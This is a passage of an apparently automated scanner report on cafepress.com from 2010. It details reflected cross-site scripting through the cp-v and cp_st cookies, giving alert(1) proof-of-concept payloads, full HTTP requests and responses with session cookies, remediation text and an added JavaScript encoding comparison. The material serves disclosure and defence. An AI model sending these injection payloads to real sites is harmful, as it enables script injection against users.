"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'cd3b0</script><script>alert(1)</script>6a078ca5ef1'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.64. http://www.cafepress.com/+sweatshirts-hoodies [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+sweatshirts-hoodies

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9849b"-alert(1)-"0b830c7e51f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+sweatshirts-hoodies HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA9849b"-alert(1)-"0b830c7e51f; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 60350
Date: Sun, 26 Dec 2010 13:46:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:59 GMT; path=/
Set-Cookie: cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:59 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9849b"-alert(1)-"0b830c7e51f";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.65. http://www.cafepress.com/+sweatshirts-hoodies [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+sweatshirts-hoodies

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19caf</script><script>alert(1)</script>e4e8e544a2a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+sweatshirts-hoodies HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=19caf</script><script>alert(1)</script>e4e8e544a2a; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 60367
Date: Sun, 26 Dec 2010 13:46:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:57 GMT; path=/
Set-Cookie: cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:57 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '19caf</script><script>alert(1)</script>e4e8e544a2a'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.66. http://www.cafepress.com/+thermos [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+thermos

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 179e4"-alert(1)-"9112d7547c6 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA179e4"-alert(1)-"9112d7547c6; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 58907
Date: Sun, 26 Dec 2010 13:47:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:30 GMT; path=/
Set-Cookie: cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:30 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA179e4"-alert(1)-"9112d7547c6";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.67. http://www.cafepress.com/+thermos [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+thermos

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dee73</script><script>alert(1)</script>b29a0dee205 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=dee73</script><script>alert(1)</script>b29a0dee205; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 58934
Date: Sun, 26 Dec 2010 13:47:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/
Set-Cookie: cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'dee73</script><script>alert(1)</script>b29a0dee205'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.68. http://www.cafepress.com/+underwear-panties [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+underwear-panties

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f16ed"-alert(1)-"d43c21ef02f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
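The two contexts seen in this report (cp-v landing in a double-quoted JavaScript string, cp_st in a single-quoted one) fail in different ways, and the difference matters for the fix. The following is an added example, not code from cafepress.com or from the scanner: it rebuilds the emitting statement with the report's own variable name (s.eVar30) and the two payload shapes, then compares raw concatenation, backslash-escaping only the quote character, and full JavaScript-string encoding. The encoder and harness function names are this example's, not the application's.

```javascript
// Added example, not code from the CafePress site or the report's tooling.
// The variable name s.eVar30 and the two payloads are taken from the report;
// everything else is assumed for illustration.

const CP_V_PAYLOAD = 'f16ed"-alert(1)-"d43c21ef02f';
const CP_ST_PAYLOAD = '7c3af</script><script>alert(1)</script>ca50a4bf9d6';

// 1. What the responses show today: raw concatenation.
const rawEncoder = (value) => value;

// 2. A common but insufficient fix: backslash-escape the delimiter (and the
//    backslash). It stops the cp-v breakout but does nothing for cp_st.
function quoteOnlyEncoder(quote) {
  return (value) => value.split('\\').join('\\\\').split(quote).join('\\' + quote);
}

// 3. Context-correct JavaScript string encoding: every UTF-16 code unit
//    outside [A-Za-z0-9] becomes \xHH (or \uHHHH). Because '<', '/' and '>'
//    are encoded as well, the HTML tokenizer can never see "</script" inside
//    the literal, so the script element cannot be terminated early.
function encodeForJsString(value) {
  let out = '';
  for (let i = 0; i < value.length; i++) {
    const c = value.charCodeAt(i);
    const ch = value[i];
    if (/[A-Za-z0-9]/.test(ch)) out += ch;
    else if (c <= 0xff) out += '\\x' + c.toString(16).padStart(2, '0');
    else out += '\\u' + c.toString(16).padStart(4, '0');
  }
  return out;
}

// Emit the statement the same way the page does.
function renderStatement(value, quote, encoder) {
  return `s.eVar30 = ${quote}${encoder(value)}${quote};`;
}

// The HTML tokenizer ends script data at "</script" followed by whitespace,
// "/" or ">", regardless of JavaScript string state. If this matches, the
// remainder of the page is parsed as HTML and the injected <script> runs.
function closesScriptElement(js) {
  return /<\/script[\s\/>]/i.test(js);
}

// Run the emitted statement with a stubbed alert() to see what the JS
// engine makes of it. new Function is acceptable only in a test harness.
function evaluateStatement(js) {
  const s = {};
  let alertCalled = false;
  try {
    new Function('s', 'alert', js)(s, () => { alertCalled = true; });
  } catch (e) {
    return { parsed: false, alertCalled, value: undefined };
  }
  return { parsed: true, alertCalled, value: s.eVar30 };
}

// Assessment of one (value, quote, encoder) combination.
function assess(value, quote, encoder) {
  const js = renderStatement(value, quote, encoder);
  const r = evaluateStatement(js);
  return {
    js,
    jsBreakout: r.alertCalled,                 // attacker code ran inside the literal
    htmlBreakout: closesScriptElement(js),     // script element terminated early
    roundTrips: r.parsed && r.value === value, // value survives intact
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const [label, value, quote] of [['cp-v', CP_V_PAYLOAD, '"'], ['cp_st', CP_ST_PAYLOAD, "'"]]) {
    console.log(label, 'raw       ', assess(value, quote, rawEncoder));
    console.log(label, 'quote-only', assess(value, quote, quoteOnlyEncoder(quote)));
    console.log(label, 'js-encoded', assess(value, quote, encodeForJsString));
  }
}
```

Run with node. For cp_st the quote-only variant reports roundTrips true and jsBreakout false, which is exactly why a JavaScript-level test misses it: the JS engine is happy, but closesScriptElement shows the browser's HTML tokenizer would end the script element at the injected </script>. Only the full encoder clears all three checks for both payloads, which is the concrete form of the advice above when the data cannot be kept out of script context altogether.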

Request

GET /+underwear-panties HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAf16ed"-alert(1)-"d43c21ef02f; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
